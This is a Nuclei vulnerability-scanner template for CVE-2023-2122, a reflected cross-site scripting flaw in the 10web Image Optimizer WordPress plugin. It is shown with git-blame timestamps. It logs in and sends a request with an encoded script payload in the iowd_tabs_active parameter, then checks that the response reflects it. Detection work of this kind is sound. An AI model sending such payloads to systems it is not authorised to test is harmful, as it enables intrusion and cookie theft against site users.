nuclei-templates/http/cves/2023/CVE-2023-2122.yaml

51 lines
1.9 KiB
YAML
Raw Normal View History

2023-06-05 07:03:16 +00:00
id: CVE-2023-2122
info:
name: Image Optimizer by 10web < 1.0.26 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/936fd93a-428d-4744-a4fc-c8da78dcbe78
- https://wordpress.org/plugins/image-optimizer-wd/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2023-2122
2023-07-15 16:29:17 +00:00
remediation: Fixed in version 1.0.27
2023-06-05 07:03:16 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-2122
cwe-id: CWE-79
2023-08-31 11:46:18 +00:00
epss-score: 0.00071
cpe: cpe:2.3:a:10web:image_optimizer:*:*:*:*:*:wordpress:*:*
epss-percentile: 0.29286
2023-06-05 07:03:16 +00:00
metadata:
max-request: 2
verified: "true"
2023-08-31 11:46:18 +00:00
framework: wordpress
vendor: 10web
product: image_optimizer
2023-07-15 16:29:17 +00:00
tags: wpscan,cve,cve2023,xss,image-optimizer-wd,wordpress,wp-plugin,wp,authenticated
2023-06-05 07:03:16 +00:00
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=iowd_settings&msg=1&iowd_tabs_active=generalry8uo%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ef0cmo HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
2023-06-05 07:36:58 +00:00
- 'contains(content_type, "text/html")'
2023-06-05 07:03:16 +00:00
- 'contains(body_2, "<img src=a onerror=alert(document.domain)>")'
- 'contains(body_2, "Image optimizer")'
condition: and